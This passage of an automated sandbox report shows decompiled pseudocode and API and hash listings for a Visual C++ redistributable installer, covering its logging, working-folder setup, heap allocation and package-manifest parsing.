				if(_a16 == 0) {
					L10:
					_t39 = E00012436(_t68,  &_v32, _t61, 0, 0xfde9);
					_t74 = _t39;
					if(_t39 >= 0) {
						_t42 =  *0x7b63c; // 0x0
						if(_t42 == 0) {
							_t43 = E00050658(_t62, _t68, _v32); // executed
						} else {
							_t43 =  *_t42(_v32,  *0x7b640);
						}
						_t74 = _t43;
					}
					L15:
					LeaveCriticalSection(0x7b60c);
					if(_v28 != 0) {
						E000554EF(_v28);
					}
					if(_v32 != 0) {
						E000554EF(_v32);
					}
					goto L19;
				}
				_push(__edi);
				_v40 = GetCurrentProcessId();
				_v36 = GetCurrentThreadId();
				asm("stosd");
				asm("stosd");
				asm("stosd");
				asm("stosd");
				GetLocalTime( &_v24);
				_t48 = _a8;
				_t49 = _t48 & 0xf0000000;
				_t73 = _t48 & 0x0fffffff;
				if(_t49 == 0xe0000000 || _a4 == 5) {
					_t75 = "e";
				} else {
					if(_t49 == 0xa0000000 || _a4 == 1) {
						_t75 = "w";
					} else {
						_t75 = "i";
					}
				}
				_t50 =  *0x7b628; // 0x0
				_t66 =  !=  ? _t50 : L"\r\n";
				_t51 =  *0x7b62c; // 0x0
				_push( !=  ? _t50 : L"\r\n");
				_push(_t61);
				_t62 =  !=  ? _t51 : 0x5b524;
				_push( !=  ? _t51 : 0x5b524);
				_push(_t73);
				_push(_t75);
				_push(_v24.wSecond & 0x0000ffff);
				_push(_v24.wMinute & 0x0000ffff);
				_push(_v24.wHour & 0x0000ffff);
				_push(_v24.wDay & 0x0000ffff);
				_push(_v24.wMonth & 0x0000ffff);
				_push(_v24.wYear & 0x0000ffff);
				_push(_v36);
				_t58 =  *0x7b624; // 0x0
				_push(_v40);
				_t68 =  !=  ? _t58 : 0x5b524;
				_t60 = E00011F20( &_v28, L"%ls[%04X:%04X][%04hu-%02hu-%02huT%02hu:%02hu:%02hu]%hs%03d:%ls %ls%ls", 0x5b524);
				_t74 = _t60;
				_pop(_t70);
				if(_t60 < 0) {
					goto L15;
				}
				goto L10;
			}




























                                                                          0x0004fdc2
                                                                          0x0004fdc8
                                                                          0x0004fdcf
                                                                          0x0004fdd3
                                                                          0x0004fdd7
                                                                          0x0004fdd9
                                                                          0x0004fddc
                                                                          0x0004fddf
                                                                          0x0004fde5
                                                                          0x0004ff34
                                                                          0x0004ff45
                                                                          0x0004ff45
                                                                          0x0004fdf0
                                                                          0x0004fdf9
                                                                          0x0004fece
                                                                          0x0004fee2
                                                                          0x0004fee7
                                                                          0x0004feeb
                                                                          0x0004feed
                                                                          0x0004fef4
                                                                          0x0004ff06
                                                                          0x0004fef6
                                                                          0x0004feff
                                                                          0x0004feff
                                                                          0x0004ff0b
                                                                          0x0004ff0b
                                                                          0x0004ff0d
                                                                          0x0004ff12
                                                                          0x0004ff1c
                                                                          0x0004ff21
                                                                          0x0004ff21
                                                                          0x0004ff2a
                                                                          0x0004ff2f
                                                                          0x0004ff2f
                                                                          0x00000000
                                                                          0x0004ff2a
                                                                          0x0004fdff
                                                                          0x0004fe06
                                                                          0x0004fe0f
                                                                          0x0004fe17
                                                                          0x0004fe18
                                                                          0x0004fe19
                                                                          0x0004fe1a
                                                                          0x0004fe1f
                                                                          0x0004fe25
                                                                          0x0004fe2a
                                                                          0x0004fe2f
                                                                          0x0004fe3a
                                                                          0x0004fe5d
                                                                          0x0004fe42
                                                                          0x0004fe47
                                                                          0x0004fe56
                                                                          0x0004fe4f
                                                                          0x0004fe4f
                                                                          0x0004fe4f
                                                                          0x0004fe47
                                                                          0x0004fe62
                                                                          0x0004fe73
                                                                          0x0004fe76
                                                                          0x0004fe7b
                                                                          0x0004fe7c
                                                                          0x0004fe81
                                                                          0x0004fe88
                                                                          0x0004fe89
                                                                          0x0004fe8a
                                                                          0x0004fe8b
                                                                          0x0004fe90
                                                                          0x0004fe95
                                                                          0x0004fe9a
                                                                          0x0004fe9f
                                                                          0x0004fea4
                                                                          0x0004fea5
                                                                          0x0004fea8
                                                                          0x0004feaf
                                                                          0x0004feb2
                                                                          0x0004febf
                                                                          0x0004fec7
                                                                          0x0004fec9
                                                                          0x0004fecc
                                                                          0x00000000
                                                                          0x00000000
                                                                          0x00000000

                                                                          APIs
                                                                          • EnterCriticalSection.KERNEL32(0007B60C,00000000,?,?,?,?,00031014,8007139F,Invalid operation for this state.,cabextract.cpp,000001C7,8007139F), ref: 0004FDF0
                                                                          • GetCurrentProcessId.KERNEL32(00000000,?,00031014,8007139F,Invalid operation for this state.,cabextract.cpp,000001C7,8007139F), ref: 0004FE00
                                                                          • GetCurrentThreadId.KERNEL32 ref: 0004FE09
                                                                          • GetLocalTime.KERNEL32(8007139F,?,00031014,8007139F,Invalid operation for this state.,cabextract.cpp,000001C7,8007139F), ref: 0004FE1F
                                                                          • LeaveCriticalSection.KERNEL32(0007B60C,?,00000000,00000000,0000FDE9), ref: 0004FF12
                                                                          Strings
                                                                          • %ls[%04X:%04X][%04hu-%02hu-%02huT%02hu:%02hu:%02hu]%hs%03d:%ls %ls%ls, xrefs: 0004FEB9
                                                                          Memory Dump Source
                                                                          • Source File: 00000004.00000002.376975196.0000000000011000.00000020.00000001.01000000.00000008.sdmp, Offset: 00010000, based on PE: true
                                                                          • Associated: 00000004.00000002.376949992.0000000000010000.00000002.00000001.01000000.00000008.sdmpDownload File
                                                                          • Associated: 00000004.00000002.377084608.000000000005B000.00000002.00000001.01000000.00000008.sdmpDownload File
                                                                          • Associated: 00000004.00000002.377148628.000000000007A000.00000004.00000001.01000000.00000008.sdmpDownload File
                                                                          • Associated: 00000004.00000002.377166369.000000000007E000.00000002.00000001.01000000.00000008.sdmpDownload File
                                                                          Joe Sandbox IDA Plugin
                                                                          • Snapshot File: hcaresult_4_2_10000_VC_redist.jbxd
                                                                          Similarity
                                                                          • API ID: CriticalCurrentSection$EnterLeaveLocalProcessThreadTime
                                                                          • String ID: %ls[%04X:%04X][%04hu-%02hu-%02huT%02hu:%02hu:%02hu]%hs%03d:%ls %ls%ls
                                                                          • API String ID: 296830338-59366893
                                                                          • Opcode ID: fdf6f99fc77ae7557ba34f27e20801d3985a40af3c35cb129b5ec57401dc5c23
                                                                          • Instruction ID: 7f4094ca192bf512d26d7a2cf6a39fbf7cb51859ce97e8d1465576b6757a5dc8
                                                                          • Opcode Fuzzy Hash: fdf6f99fc77ae7557ba34f27e20801d3985a40af3c35cb129b5ec57401dc5c23
                                                                          • Instruction Fuzzy Hash: 8A417F72D00619AFEB609BA5CC45AFFB7F8AB08712F404035FA05E6151D73C9D84CBA5
                                                                          Uniqueness

                                                                          Uniqueness Score: -1.00%

                                                                          Function 00029EB7 Relevance: 7.1, APIs: 1, Strings: 3, Instructions: 51COMMON
                                                                          Download Yara Rule
                                                                          C-Code - Quality: 21%
                                                                          			E00029EB7(void* __ecx, void* __edx, void* __eflags, intOrPtr _a4, intOrPtr _a8) {
				void* _v8;
				void* _t12;
				void* _t13;
				void* _t27;

				_v8 = 0;
				_t12 = E000280AE(__edx, _a4,  &_v8); // executed
				if(_t12 >= 0) {
					_t13 = E00014013(_v8, 0); // executed
					_t27 = _t13;
					if(_t27 >= 0) {
						__imp__DecryptFileW(_v8, 0); // executed
						if(_a8 != 0) {
							_t27 = E000121A5(_a8, _v8, 0);
							if(_t27 < 0) {
								_push("Failed to copy working folder.");
								goto L7;
							}
						}
					} else {
						_push("Failed create working folder.");
						goto L7;
					}
				} else {
					_push("Failed to calculate working folder to ensure it exists.");
					L7:
					_push(_t27);
					E0005012F();
				}
				if(_v8 != 0) {
					E000554EF(_v8);
				}
				return _t27;
			}







                                                                          0x00029ec6
                                                                          0x00029ec9
                                                                          0x00029ed2
                                                                          0x00029edf
                                                                          0x00029ee4
                                                                          0x00029ee8
                                                                          0x00029ef5
                                                                          0x00029efe
                                                                          0x00029f0c
                                                                          0x00029f10
                                                                          0x00029f12
                                                                          0x00000000
                                                                          0x00029f12
                                                                          0x00029f10
                                                                          0x00029eea
                                                                          0x00029eea
                                                                          0x00000000
                                                                          0x00029eea
                                                                          0x00029ed4
                                                                          0x00029ed4
                                                                          0x00029f17
                                                                          0x00029f17
                                                                          0x00029f18
                                                                          0x00029f1e
                                                                          0x00029f22
                                                                          0x00029f27
                                                                          0x00029f27
                                                                          0x00029f33

                                                                          Strings
                                                                          • Failed to copy working folder., xrefs: 00029F12
                                                                          • Failed to calculate working folder to ensure it exists., xrefs: 00029ED4
                                                                          • Failed create working folder., xrefs: 00029EEA
                                                                          Memory Dump Source
                                                                          • Source File: 00000004.00000002.376975196.0000000000011000.00000020.00000001.01000000.00000008.sdmp, Offset: 00010000, based on PE: true
                                                                          • Associated: 00000004.00000002.376949992.0000000000010000.00000002.00000001.01000000.00000008.sdmpDownload File
                                                                          • Associated: 00000004.00000002.377084608.000000000005B000.00000002.00000001.01000000.00000008.sdmpDownload File
                                                                          • Associated: 00000004.00000002.377148628.000000000007A000.00000004.00000001.01000000.00000008.sdmpDownload File
                                                                          • Associated: 00000004.00000002.377166369.000000000007E000.00000002.00000001.01000000.00000008.sdmpDownload File
                                                                          Joe Sandbox IDA Plugin
                                                                          • Snapshot File: hcaresult_4_2_10000_VC_redist.jbxd
                                                                          Similarity
                                                                          • API ID: CurrentDirectoryErrorLastProcessWindows
                                                                          • String ID: Failed create working folder.$Failed to calculate working folder to ensure it exists.$Failed to copy working folder.
                                                                          • API String ID: 3841436932-2072961686
                                                                          • Opcode ID: dd5a7f22c0d767e12d422a5a49c346ab5660d7c681b1dba16661cabcd5ab289a
                                                                          • Instruction ID: 2804721c9d023a6dc0c6c593df701dc7e4402769a08f1dedafc56d3e58e64d8b
                                                                          • Opcode Fuzzy Hash: dd5a7f22c0d767e12d422a5a49c346ab5660d7c681b1dba16661cabcd5ab289a
                                                                          • Instruction Fuzzy Hash: E9018831D05638F78FA29B55ED06CEFBA79DF81721F114165F904AA112DB328E50A6D0
                                                                          Uniqueness

                                                                          Uniqueness Score: -1.00%

                                                                          Function 00044812 Relevance: 4.5, APIs: 3, Instructions: 20COMMONLIBRARYCODE
                                                                          Download Yara Rule
                                                                          C-Code - Quality: 100%
                                                                          			E00044812(int _a4) {
				void* _t14;
				void* _t15;
				void* _t17;
				void* _t18;
				void* _t19;

				if(E00048A73(_t14, _t15, _t17, _t18, _t19) != 0 && ( *( *[fs:0x30] + 0x68) >> 0x00000008 & 0x00000001) == 0) {
					TerminateProcess(GetCurrentProcess(), _a4);
				}
				E00044897(_t15, _a4);
				ExitProcess(_a4);
			}








                                                                          0x0004481e
                                                                          0x0004483a
                                                                          0x0004483a
                                                                          0x00044843
                                                                          0x0004484c

                                                                          APIs
                                                                          • GetCurrentProcess.KERNEL32(00000000,?,000447E8,00000000,00077CF8,0000000C,0004493F,00000000,00000002,00000000), ref: 00044833
                                                                          • TerminateProcess.KERNEL32(00000000,?,000447E8,00000000,00077CF8,0000000C,0004493F,00000000,00000002,00000000), ref: 0004483A
                                                                          • ExitProcess.KERNEL32 ref: 0004484C
                                                                          Memory Dump Source
                                                                          • Source File: 00000004.00000002.376975196.0000000000011000.00000020.00000001.01000000.00000008.sdmp, Offset: 00010000, based on PE: true
                                                                          • Associated: 00000004.00000002.376949992.0000000000010000.00000002.00000001.01000000.00000008.sdmpDownload File
                                                                          • Associated: 00000004.00000002.377084608.000000000005B000.00000002.00000001.01000000.00000008.sdmpDownload File
                                                                          • Associated: 00000004.00000002.377148628.000000000007A000.00000004.00000001.01000000.00000008.sdmpDownload File
                                                                          • Associated: 00000004.00000002.377166369.000000000007E000.00000002.00000001.01000000.00000008.sdmpDownload File
                                                                          Joe Sandbox IDA Plugin
                                                                          • Snapshot File: hcaresult_4_2_10000_VC_redist.jbxd
                                                                          Similarity
                                                                          • API ID: Process$CurrentExitTerminate
                                                                          • String ID:
                                                                          • API String ID: 1703294689-0
                                                                          • Opcode ID: 0777cf9eab177cc66dd2c241465f13cdbdffc3d6a8d58e02bd5be7409c362750
                                                                          • Instruction ID: a98a540d67536a2af6ed9e51d2035a4e863699b6def9bbdf4b70ee04056a6624
                                                                          • Opcode Fuzzy Hash: 0777cf9eab177cc66dd2c241465f13cdbdffc3d6a8d58e02bd5be7409c362750
                                                                          • Instruction Fuzzy Hash: 5CE09271400688ABDF516F65D909AAE3B69AB41342F454428F8058B122DB39E952DA98
                                                                          Uniqueness

                                                                          Uniqueness Score: -1.00%

                                                                          Function 000138D4 Relevance: 3.0, APIs: 2, Instructions: 13memoryCOMMONLIBRARYCODE
                                                                          Download Yara Rule
                                                                          C-Code - Quality: 58%
                                                                          			E000138D4(long _a4, signed int _a8) {
				void* _t7;

				asm("sbb eax, eax");
				_t7 = RtlAllocateHeap(GetProcessHeap(),  ~_a8 & 0x00000008, _a4); // executed
				return _t7;
			}




                                                                          0x000138df
                                                                          0x000138ec
                                                                          0x000138f3

                                                                          APIs
                                                                          • GetProcessHeap.KERNEL32(?,000001C7,?,00012284,000001C7,00000001,80004005,8007139F,?,?,0005015F,8007139F,?,00000000,00000000,8007139F), ref: 000138E5
                                                                          • RtlAllocateHeap.NTDLL(00000000,?,00012284,000001C7,00000001,80004005,8007139F,?,?,0005015F,8007139F,?,00000000,00000000,8007139F), ref: 000138EC
                                                                          Memory Dump Source
                                                                          • Source File: 00000004.00000002.376975196.0000000000011000.00000020.00000001.01000000.00000008.sdmp, Offset: 00010000, based on PE: true
                                                                          • Associated: 00000004.00000002.376949992.0000000000010000.00000002.00000001.01000000.00000008.sdmpDownload File
                                                                          • Associated: 00000004.00000002.377084608.000000000005B000.00000002.00000001.01000000.00000008.sdmpDownload File
                                                                          • Associated: 00000004.00000002.377148628.000000000007A000.00000004.00000001.01000000.00000008.sdmpDownload File
                                                                          • Associated: 00000004.00000002.377166369.000000000007E000.00000002.00000001.01000000.00000008.sdmpDownload File
                                                                          Joe Sandbox IDA Plugin
                                                                          • Snapshot File: hcaresult_4_2_10000_VC_redist.jbxd
                                                                          Similarity
                                                                          • API ID: Heap$AllocateProcess
                                                                          • String ID:
                                                                          • API String ID: 1357844191-0
                                                                          • Opcode ID: 4524fdd042af25fa3db74e7f15361a92f4056be3f073b11ef104cac9a8e41eb4
                                                                          • Instruction ID: 359f2145ed62f0275cfc94a90f38cb166addf9a7b7b5c4fcbd8380e491ed5061
                                                                          • Opcode Fuzzy Hash: 4524fdd042af25fa3db74e7f15361a92f4056be3f073b11ef104cac9a8e41eb4
                                                                          • Instruction Fuzzy Hash: 90C012321A0708AB8F406FF8EC0EC9A3BACAB686037408400B905C2150DB3CF0148B64
                                                                          Uniqueness

                                                                          Uniqueness Score: -1.00%

                                                                          Function 0003E773 Relevance: 1.5, APIs: 1, Instructions: 3COMMON
                                                                          Download Yara Rule
                                                                          C-Code - Quality: 100%
                                                                          			E0003E773() {
				_Unknown_base(*)()* _t1;

				_t1 = SetUnhandledExceptionFilter(E0003E77F); // executed
				return _t1;
			}




                                                                          0x0003e778
                                                                          0x0003e77e

                                                                          APIs
                                                                          • SetUnhandledExceptionFilter.KERNELBASE(Function_0002E77F,0003DEF8), ref: 0003E778
                                                                          Memory Dump Source
                                                                          • Source File: 00000004.00000002.376975196.0000000000011000.00000020.00000001.01000000.00000008.sdmp, Offset: 00010000, based on PE: true
                                                                          • Associated: 00000004.00000002.376949992.0000000000010000.00000002.00000001.01000000.00000008.sdmpDownload File
                                                                          • Associated: 00000004.00000002.377084608.000000000005B000.00000002.00000001.01000000.00000008.sdmpDownload File
                                                                          • Associated: 00000004.00000002.377148628.000000000007A000.00000004.00000001.01000000.00000008.sdmpDownload File
                                                                          • Associated: 00000004.00000002.377166369.000000000007E000.00000002.00000001.01000000.00000008.sdmpDownload File
                                                                          Joe Sandbox IDA Plugin
                                                                          • Snapshot File: hcaresult_4_2_10000_VC_redist.jbxd
                                                                          Similarity
                                                                          • API ID: ExceptionFilterUnhandled
                                                                          • String ID:
                                                                          • API String ID: 3192549508-0
                                                                          • Opcode ID: 57cc036a6b5489b41a45003a776e1cba86e643729b513cb4d0b813873e00abaa
                                                                          • Instruction ID: c931b54d8f799867eff4f5b71183e017cc8a3d4f971b9b3705d861aa5d0b7290
                                                                          • Opcode Fuzzy Hash: 57cc036a6b5489b41a45003a776e1cba86e643729b513cb4d0b813873e00abaa
                                                                          • Instruction Fuzzy Hash:
                                                                          Uniqueness

                                                                          Uniqueness Score: -1.00%

                                                                          Function 0001DE25 Relevance: 124.9, APIs: 11, Strings: 60, Instructions: 646COMMON
                                                                          Download Yara Rule
                                                                          C-Code - Quality: 71%
                                                                          			E0001DE25(void* __ebx, void* __edi, intOrPtr* _a4, intOrPtr _a8, intOrPtr _a12) {
				signed int _v8;
				signed int _v12;
				signed int _v16;
				signed int _v20;
				signed int _v24;
				signed int _v28;
				signed int _v32;
				signed int _v36;
				short** _v40;
				intOrPtr* _t208;
				intOrPtr* _t213;
				intOrPtr _t223;
				signed int _t224;
				int _t235;
				signed int _t256;
				int _t262;
				signed int _t268;
				intOrPtr _t271;
				intOrPtr _t275;
				signed int _t279;
				intOrPtr _t280;
				signed int _t292;
				intOrPtr _t302;
				signed int _t303;
				intOrPtr* _t318;
				short** _t320;
				intOrPtr* _t322;
				intOrPtr* _t324;
				intOrPtr* _t325;
				signed int _t328;
				signed int _t329;
				intOrPtr* _t330;
				signed int _t336;
				void* _t346;
				signed int _t347;
				signed int _t348;
				signed int _t349;
				signed int _t350;
				signed int _t351;
				short** _t358;
				void* _t360;

				_v20 = _v20 & 0x00000000;
				_v8 = _v8 & 0x00000000;
				_v24 = _v24 & 0x00000000;
				_v12 = _v12 & 0x00000000;
				_v28 = _v28 & 0x00000000;
				_v16 = _v16 & 0x00000000;
				_t351 = E00053803(_a12, L"RollbackBoundary",  &_v20);
				if(_t351 >= 0) {
					_t208 = _v20;
					_t321 =  *_t208;
					_t351 =  *((intOrPtr*)( *_t208 + 0x20))(_t208,  &_v24);
					if(_t351 >= 0) {
						_t210 = _v24;
						_push(__ebx);
						_t318 = _a4;
						if(_v24 == 0) {
							L17:
							_t322 = _v20;
							if(_t322 != 0) {
								 *((intOrPtr*)( *_t322 + 8))(_t322);
								_v20 = _v20 & 0x00000000;
							}
							if(E00053803(_a12, L"Chain/ExePackage|Chain/MsiPackage|Chain/MspPackage|Chain/MsuPackage",  &_v20) >= 0) {
								_t213 = _v20;
								_t340 =  &_v24;
								_push( &_v24);
								_push(_t213);
								if( *((intOrPtr*)( *_t213 + 0x20))() >= 0) {
									_t215 = _v24;
									if(_v24 == 0) {
										L123:
										_t351 = 0;
										goto L124;
									}
									_t223 = E000138D4(_t215 * 0xe0, 1); // executed
									 *((intOrPtr*)(_t318 + 8)) = _t223;
									if(_t223 != 0) {
										_t224 = _v24;
										_v32 = _v32 & 0x00000000;
										 *((intOrPtr*)(_t318 + 0xc)) = _t224;
										if(_t224 == 0) {
											L106:
											_t351 = E0001D87E(_t318, _a12);
											if(_t351 >= 0) {
												goto L123;
											}
											_push("Failed to parse target product codes.");
											goto L108;
										}
										_t328 = 0;
										_v36 = 0;
										while(1) {
											_t346 =  *((intOrPtr*)(_t318 + 8)) + _t328;
											_t351 = E00053760(_t328, _v20,  &_v8,  &_v12);
											if(_t351 < 0) {
												break;
											}
											_t351 = E000531C7(_v8, L"Id", _t346);
											if(_t351 < 0) {
												L121:
												_push("Failed to get @Id.");
												goto L108;
											}
											_t351 = E000531C7(_v8, L"Cache",  &_v16);
											if(_t351 < 0) {
												_push("Failed to get @Cache.");
												goto L108;
											}
											if(CompareStringW(0x7f, 0, _v16, 0xffffffff, L"no", 0xffffffff) != 2) {
												if(CompareStringW(0x7f, 0, _v16, 0xffffffff, L"yes", 0xffffffff) != 2) {
													_t235 = CompareStringW(0x7f, 0, _v16, 0xffffffff, L"always", 0xffffffff);
													_t328 = 2;
													if(_t235 != _t328) {
														_push(_v16);
														_t351 = 0x8000ffff;
														_push("Invalid cache type: %ls");
														L119:
														_push(_t351);
														E0005012F();
														goto L124;
													}
													 *(_t346 + 0x20) = _t328;
													L37:
													_t351 = E000531C7(_v8, L"CacheId", _t346 + 0x24);
													if(_t351 < 0) {
														_push("Failed to get @CacheId.");
														goto L108;
													}
													_t351 = E0005329B(_v8, L"Size", _t346 + 0x30);
													if(_t351 < 0) {
														_push("Failed to get @Size.");
														goto L108;
													}
													_t351 = E0005329B(_v8, L"InstallSize", _t346 + 0x28);
													if(_t351 < 0) {
														_push("Failed to get @InstallSize.");
														goto L108;
													}
													_t351 = E000533DB(_t328, _v8, L"PerMachine", _t346 + 0x14);
													if(_t351 < 0) {
														_push("Failed to get @PerMachine.");
														goto L108;
													}
													_t351 = E000533DB(_t328, _v8, L"Permanent", _t346 + 0x18);
													if(_t351 < 0) {
														_push("Failed to get @Permanent.");
														goto L108;
													}
													 *(_t346 + 0x18) = 0 |  *(_t346 + 0x18) == 0x00000000;
													_t351 = E000533DB(_t328, _v8, L"Vital", _t346 + 0x1c);
													if(_t351 < 0) {
														L112:
														_push("Failed to get @Vital.");
														goto L108;
													}
													_t351 = E000531C7(_v8, L"LogPathVariable", _t346 + 4);
													if(_t351 == 0x80070490 || _t351 >= 0) {
														_t351 = E000531C7(_v8, L"RollbackLogPathVariable", _t346 + 8);
														if(_t351 == 0x80070490 || _t351 >= 0) {
															_t256 = E000531C7(_v8, L"InstallCondition", _t346 + 0xc); // executed
															_t351 = _t256;
															if(_t351 == 0x80070490 || _t351 >= 0) {
																_t351 = E000531C7(_v8, L"RollbackBoundaryForward",  &_v16);
																if(_t351 == 0x80070490) {
																	L52:
																	_t351 = E000531C7(_v8, L"RollbackBoundaryBackward",  &_v16);
																	if(_t351 == 0x80070490) {
																		L55:
																		if(CompareStringW(0x7f, 0, _v12, 0xffffffff, L"ExePackage", 0xffffffff) != 2) {
																			_t262 = CompareStringW(0x7f, 0, _v12, 0xffffffff, L"MsiPackage", 0xffffffff);
																			_t329 = 2;
																			if(_t262 != _t329) {
																				if(CompareStringW(0x7f, 0, _v12, 0xffffffff, L"MspPackage", 0xffffffff) != 2) {
																					if(CompareStringW(0x7f, 0, _v12, 0xffffffff, L"MsuPackage", 0xffffffff) != 2) {
																						L66:
																						_t351 = E0001D9EE(_t318, _t346, _a8, _v8);
																						if(_t351 < 0) {
																							_push("Failed to parse payload references.");
																							goto L108;
																						}
																						_t351 = E00037CD9(_t346, _v8);
																						if(_t351 < 0) {
																							_push("Failed to parse dependency providers.");
																							goto L108;
																						}
																						_t330 = _v8;
																						if(_t330 != 0) {
																							 *((intOrPtr*)( *_t330 + 8))(_t330);
																							_v8 = _v8 & 0x00000000;
																						}
																						if(_v12 != 0) {
																							__imp__#6(_v12);
																							_v12 = _v12 & 0x00000000;
																						}
																						_t268 = _v32 + 1;
																						_t328 = _v36 + 0xe0;
																						_v32 = _t268;
																						_v36 = _t328;
																						if(_t268 < _v24) {
																							continue;
																						} else {
																							_t356 = _v28;
																							if(_v28 == 0) {
																								goto L106;
																							}
																							_t271 = E000138D4(_t356 << 4, 1);
																							 *((intOrPtr*)(_t318 + 0x20)) = _t271;
																							if(_t271 != 0) {
																								 *((intOrPtr*)(_t318 + 0x24)) = E000138D4(_t356 << 2, 1);
																								if( *((intOrPtr*)(_t318 + 0x20)) != 0) {
																									_t275 = 0;
																									_a8 = 0;
																									if( *((intOrPtr*)(_t318 + 0xc)) <= 0) {
																										goto L106;
																									}
																									_t347 = 0;
																									_v28 = 0;
																									do {
																										_t358 =  *((intOrPtr*)(_t318 + 8)) + _t347;
																										_v40 = _t358;
																										if( *((intOrPtr*)(_t358 + 0x8c)) != 3) {
																											goto L105;
																										}
																										 *((intOrPtr*)( *((intOrPtr*)(_t318 + 0x20)) + ( *(_t318 + 0x28) +  *(_t318 + 0x28)) * 8)) =  *((intOrPtr*)(_t358 + 0x94));
																										 *((intOrPtr*)( *((intOrPtr*)(_t318 + 0x20)) + 4 + ( *(_t318 + 0x28) +  *(_t318 + 0x28)) * 8)) = 2;
																										 *((intOrPtr*)( *((intOrPtr*)(_t318 + 0x24)) +  *(_t318 + 0x28) * 4)) = _t358;
																										_t336 = 0;
																										 *(_t318 + 0x28) =  *(_t318 + 0x28) + 1;
																										_v36 = 0;
																										if( *((intOrPtr*)(_t318 + 0xc)) <= 0) {
																											L104:
																											_t275 = _a8;
																											goto L105;
																										}
																										_t279 = 0;
																										_v32 = 0;
																										do {
																											_t360 =  *((intOrPtr*)(_t318 + 8)) + _t279;
																											if( *((intOrPtr*)(_t360 + 0x8c)) != 2) {
																												goto L102;
																											}
																											_t348 = 0;
																											if( *((intOrPtr*)(_t360 + 0xd4)) <= 0) {
																												goto L102;
																											}
																											_t320 = _v40;
																											do {
																												_t280 =  *((intOrPtr*)(_t360 + 0xd0));
																												if( *(_t280 + _t348 * 4) != 0 && CompareStringW(0x7f, 0,  *_t320, 0xffffffff,  *(_t280 + _t348 * 4), 0xffffffff) == 2) {
																													 *( *((intOrPtr*)(_t360 + 0xcc)) + _t348 * 4) = _t320;
																													_t283 =  *((intOrPtr*)(_t360 + 0xd0));
																													if( *( *((intOrPtr*)(_t360 + 0xd0)) + _t348 * 4) != 0) {
																														E000554EF( *((intOrPtr*)(_t283 + _t348 * 4)));
																														 *( *((intOrPtr*)(_t360 + 0xd0)) + _t348 * 4) =  *( *((intOrPtr*)(_t360 + 0xd0)) + _t348 * 4) & 0x00000000;
																													}
																												}
																												_t348 = _t348 + 1;
																											} while (_t348 <  *((intOrPtr*)(_t360 + 0xd4)));
																											_t318 = _a4;
																											_t279 = _v32;
																											_t336 = _v36;
																											L102:
																											_t336 = _t336 + 1;
																											_t279 = _t279 + 0xe0;
																											_v36 = _t336;
																											_v32 = _t279;
																										} while (_t336 <  *((intOrPtr*)(_t318 + 0xc)));
																										_t347 = _v28;
																										goto L104;
																										L105:
																										_t275 = _t275 + 1;
																										_t347 = _t347 + 0xe0;
																										_a8 = _t275;
																										_v28 = _t347;
																									} while (_t275 <  *((intOrPtr*)(_t318 + 0xc)));
																									goto L106;
																								}
																								_t349 = 0x8007000e;
																								_t351 = 0x8007000e;
																								E000137D3(_t274, "package.cpp", 0x100, 0x8007000e);
																								_push("Failed to allocate memory for patch sequence information to package lookup.");
																								L87:
																								_push(_t349);
																								goto L109;
																							}
																							_t349 = 0x8007000e;
																							_t351 = 0x8007000e;
																							E000137D3(_t271, "package.cpp", 0xfd, 0x8007000e);
																							_push("Failed to allocate memory for MSP patch sequence information.");
																							goto L87;
																						}
																					}
																					 *(_t346 + 0x8c) = 4;
																					_t351 = E00036F47(_v8, _t346);
																					if(_t351 < 0) {
																						_push("Failed to parse MSU package.");
																						goto L108;
																					}
																					goto L66;
																				}
																				 *(_t346 + 0x8c) = 3;
																				_t351 = E0003643A(_t318, _v8, _t346);
																				if(_t351 < 0) {
																					_push("Failed to parse MSP package.");
																					goto L108;
																				}
																				_v28 = _v28 + 1;
																				goto L66;
																			}
																			 *(_t346 + 0x8c) = _t329;
																			_t292 = E00034888(_t340, _v8, _t346); // executed
																			_t351 = _t292;
																			if(_t351 >= 0) {
																				goto L66;
																			}
																			_push("Failed to parse MSI package.");
																			goto L108;
																		}
																		 *(_t346 + 0x8c) = 1;
																		_t351 = E000325AF(_t328, _v8, _t346);
																		if(_t351 >= 0) {
																			goto L66;
																		}
																		_push("Failed to parse EXE package.");
																		goto L108;
																	}
																	if(_t351 < 0) {
																		_push("Failed to get @RollbackBoundaryBackward.");
																		goto L108;
																	}
																	_t351 = E0001D82F(_t318, _v16, _t346 + 0x3c);
																	if(_t351 < 0) {
																		_push(_v16);
																		_push("Failed to find backward transaction boundary: %ls");
																		goto L119;
																	}
																	goto L55;
																}
																if(_t351 < 0) {
																	_push("Failed to get @RollbackBoundaryForward.");
																	goto L108;
																}
																_t351 = E0001D82F(_t318, _v16, _t346 + 0x38);
																if(_t351 < 0) {
																	_push(_v16);
																	_push("Failed to find forward transaction boundary: %ls");
																	goto L119;
																}
																goto L52;
															} else {
																_push("Failed to get @InstallCondition.");
																goto L108;
															}
														} else {
															_push("Failed to get @RollbackLogPathVariable.");
															goto L108;
														}
													} else {
														_push("Failed to get @LogPathVariable.");
														goto L108;
													}
												}
												 *(_t346 + 0x20) = 1;
												goto L37;
											}
											 *(_t346 + 0x20) =  *(_t346 + 0x20) & 0x00000000;
											goto L37;
										}
										L122:
										_push("Failed to get next node.");
										goto L108;
									}
									_t349 = 0x8007000e;
									_t351 = 0x8007000e;
									E000137D3(_t223, "package.cpp", 0x5f, 0x8007000e);
									_push("Failed to allocate memory for package structs.");
									goto L87;
								}
								_push("Failed to get package node count.");
								goto L108;
							} else {
								_push("Failed to select package nodes.");
								L108:
								_push(_t351);
								L109:
								E0005012F();
								L124:
								L125:
								_t324 = _v20;
								if(_t324 != 0) {
									 *((intOrPtr*)( *_t324 + 8))(_t324);
								}
								_t325 = _v8;
								if(_t325 != 0) {
									 *((intOrPtr*)( *_t325 + 8))(_t325);
								}
								if(_v12 != 0) {
									__imp__#6(_v12);
								}
								if(_v16 != 0) {
									E000554EF(_v16);
								}
								return _t351;
							}
						}
						_t302 = E000138D4(_t210 << 3, 1);
						 *_t318 = _t302;
						if(_t302 != 0) {
							_t303 = _v24;
							_t350 = 0;
							 *((intOrPtr*)(_t318 + 4)) = _t303;
							if(_t303 == 0) {
								goto L17;
							} else {
								goto L9;
							}
							while(1) {
								L9:
								_v32 =  *_t318 + _t350 * 8;
								_t351 = E00053760(_t321, _v20,  &_v8,  &_v12);
								if(_t351 < 0) {
									goto L122;
								}
								_t351 = E000531C7(_v8, L"Id", _v32);
								if(_t351 < 0) {
									goto L121;
								}
								_t351 = E000533DB(_t321, _v8, L"Vital", _v32 + 4);
								if(_t351 < 0) {
									goto L112;
								}
								_t321 = _v8;
								if(_t321 != 0) {
